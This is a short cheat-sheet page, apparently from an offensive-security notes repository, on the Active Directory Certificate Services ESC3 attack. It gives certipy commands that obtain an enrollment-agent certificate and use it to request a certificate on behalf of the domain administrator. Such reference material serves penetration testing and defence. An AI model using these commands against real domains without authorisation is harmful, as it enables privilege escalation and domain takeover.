daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-esc03.md (1104B)


      1 ---
      2 title: "Active Directory - Certificate ESC3"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-esc03.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc03.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Certificate ESC3
     12 
     13 ## ESC3 - Misconfigured Enrollment Agent Templates
     14 
     15 > ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users
     16 
     17 * Request a certificate based on the vulnerable certificate template ESC3.
     18 
     19   ```ps1
     20   $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3'
     21   [*] Saved certificate and private key to 'john.pfx'
     22   ```
     23 
     24 * Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user
     25 
     26   ```ps1
     27   certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
     28   ```
     29 
     30 ## References